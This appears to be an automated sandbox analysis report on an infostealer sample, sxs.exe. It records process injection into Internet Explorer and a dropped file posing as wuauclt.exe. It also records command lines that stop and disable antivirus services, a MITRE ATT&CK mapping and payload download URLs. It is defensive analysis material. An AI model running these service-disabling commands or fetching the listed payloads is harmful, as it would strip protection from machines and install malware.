Source: C:\Windows\wuauclt.exe | Memory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: D50000 protect: page execute and read and write
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_3_00741BC1
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_3_00741BC1
Source: C:\Windows\wuauclt.exe | Code function: 42_3_02311BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 42_3_02311BC1
Source: C:\Users\user\Desktop\sxs.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 100000 value starts with: 4D5A
Source: C:\Windows\wuauclt.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: D50000 value starts with: 4D5A
Source: C:\Users\user\Desktop\sxs.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 100000
Source: C:\Users\user\Desktop\sxs.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A36
Source: C:\Users\user\Desktop\sxs.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A3B
Source: C:\Users\user\Desktop\sxs.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A59
Source: C:\Users\user\Desktop\sxs.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A59
Source: C:\Windows\wuauclt.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: D50000
Source: C:\Windows\wuauclt.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A36
Source: C:\Windows\wuauclt.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A3B
Source: C:\Windows\wuauclt.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A59
Source: C:\Windows\wuauclt.exe | Memory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A59
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Users\user\Desktop\sxs.exe | Process created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe"
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.com
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccess
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVWSC
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVSrvXP
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVSrvXP start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop kavsvc
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config kavsvc start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsRavMon start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsCCenter
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsCCenter start= disabled
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsRavMon
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop sharedaccess
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVWSC
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop kavsvc
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsCCenter
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsRavMon
Source: C:\Windows\wuauclt.exe | Process created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Windows\wuauclt.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" http://www.dvdforone.com
Source: wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Program ManagerhNotificationAreaIconWindowClassut Application
Source: wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Program ManagerhNotificationAreaIconWindowClass
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_2_00402728 GetSystemTime, 0_2_00402728
Source: C:\Users\user\Desktop\sxs.exe | Code function: 0_3_007418A1 GetVersionExA, 0_3_007418A1
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: kavstart.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: CCenter.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: KavPFW.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: Kav.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: kav32.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: Kvsrvxp.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: kavsvc.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: RavMonD.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: Rtvscan.exe
Source: C:\Windows\wuauclt.exe | Code function: 4_2_0040558C FindWindowA,EnumChildWindows,FindWindowExA, 4_2_0040558C
Source: C:\Windows\wuauclt.exe | Code function: 42_2_0040558C FindWindowA,EnumChildWindows,FindWindowExA, 42_2_0040558C
MITRE ATT&CK Matrix (one line per tactic; the number in parentheses is the count shown in the report beside each matched technique, techniques without a number are the matrix's unmatched entries)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Replication Through Removable Media (12); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (11); Service Execution (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Windows Service (11); Registry Run Keys / Startup Folder (11); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading (1); Windows Service (11); Process Injection (512); Registry Run Keys / Startup Folder (11); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (2); DLL Side-Loading (1); File Deletion (1); Masquerading (121); Modify Registry (1); Virtualization/Sandbox Evasion (21); Process Injection (512)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (1); Peripheral Device Discovery (11); File and Directory Discovery (2); System Information Discovery (4); Security Software Discovery (211); Virtualization/Sandbox Evasion (21); Process Discovery (2); System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Email Collection (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID: 1501290, Sample: sxs.exe, Startdate: 29/08/2024, Architecture: WINDOWS, Score: 100): rendered process graph showing sxs.exe dropping and starting C:\Windows\wuauclt.exe (plus C:\Windows\noruns.reg), wuauclt.exe launching regedit.exe, net.exe/net1.exe, iexplore.exe and explorer.exe, and the contacted domains www.dvdforone.com, msg.tmhacker.com, 1861119.com and www.onefordvd.com (15.197.204.56).

Source | Detection | Scanner | Label | Link
sxs.exe | 91% | ReversingLabs | Win32.Infostealer.QqRob |
sxs.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
sxs.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Windows\wuauclt.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
C:\Windows\wuauclt.exe | 100% | Joe Sandbox ML | |
C:\Windows\wuauclt.exe | 91% | ReversingLabs | Win32.Infostealer.QqRob |
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
gddomainparking.com | 54.174.215.77 | true | false | | unknown
google.com | 142.250.186.110 | true | false | | unknown
syndicatedsearch.goog | 172.217.16.206 | true | false | | unknown
ad.doubleclick.net | 216.58.206.38 | true | false | | unknown
www.google.com | 142.250.186.68 | true | false | | unknown
btloader.com | 172.67.41.60 | true | false | | unknown
googlehosted.l.googleusercontent.com | 142.250.186.161 | true | false | | unknown
www.onefordvd.com | 15.197.204.56 | true | false | | unknown
ad-delivery.net | 172.67.69.19 | true | false | | unknown
img1.wsimg.com | unknown | unknown | false | | unknown
1861119.com | unknown | unknown | false | | unknown
afs.googleusercontent.com | unknown | unknown | false | | unknown
www.dvdforone.com | unknown | unknown | false | | unknown
api.aws.parking.godaddy.com | unknown | unknown | false | | unknown
msg.tmhacker.com | unknown | unknown | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/ie.txt&wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/1.txtWsxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dvdforone.com/23explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/ie.txt)wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dvdforone.comwuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://domainretailing.com/rg-dsale3p.php?d=onefordvd.comchromecache_112.8.dr, chromecache_103.8.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/index.exeEwuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/ie.txt-wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/1.txtOsxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/ie.txt/wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.csschromecache_90.8.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/ie.txt~nwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/index.exe0Uwuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://w.tw7890.com/sxs.exe, 00000000.00000003.2016117630.0000000000740000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177702991.00000000021E0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://1861119.com/index.exe8wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/tean1.txtJS;.JSE;.WSF;.WSH;#Fwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/ie.txtp1wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dvdforone.com/oexplorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/index.exe.sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/~explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/23M4explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/6xexplorer.exe, 0000000C.00000002.2676562250.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/vexplorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dvdforone.com/4b823sexplorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/texplorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com_sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/nexplorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tw7890.com/twv/help.exehttp://www.om7890.com/mfx/help.exehttp://www.hg7890.com/hgb/help.esxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.onefordvd.com/lexplorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.comeexplorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/iexplorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/tean1.txtMEwuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/10explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/down.txtrpwuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/down.txtrjwuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/ie.txtSiawuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/Yexplorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/Wexplorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dvdforone.com/Vhexplorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/ie.txt~sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tw7890.com/twv/help.exesxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://1861119.com/ie.txtlatewuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/1.txtnsssxs.exe, 00000000.00000002.2041399746.0000000000859000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/4b823explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.comsxs.exe, 00000000.00000002.2041399746.000000000084B000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/tean1.txt&wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dvdforone.comC:wuauclt.exe, 0000002A.00000002.2235700906.0000000002220000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://1861119.com/index.exe3Nwuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.onefordvd.com/c%1explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dvdforone.com/explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000002.2804925525.0000000000533000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://msg.tmhacker.com/tean1.txtwuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
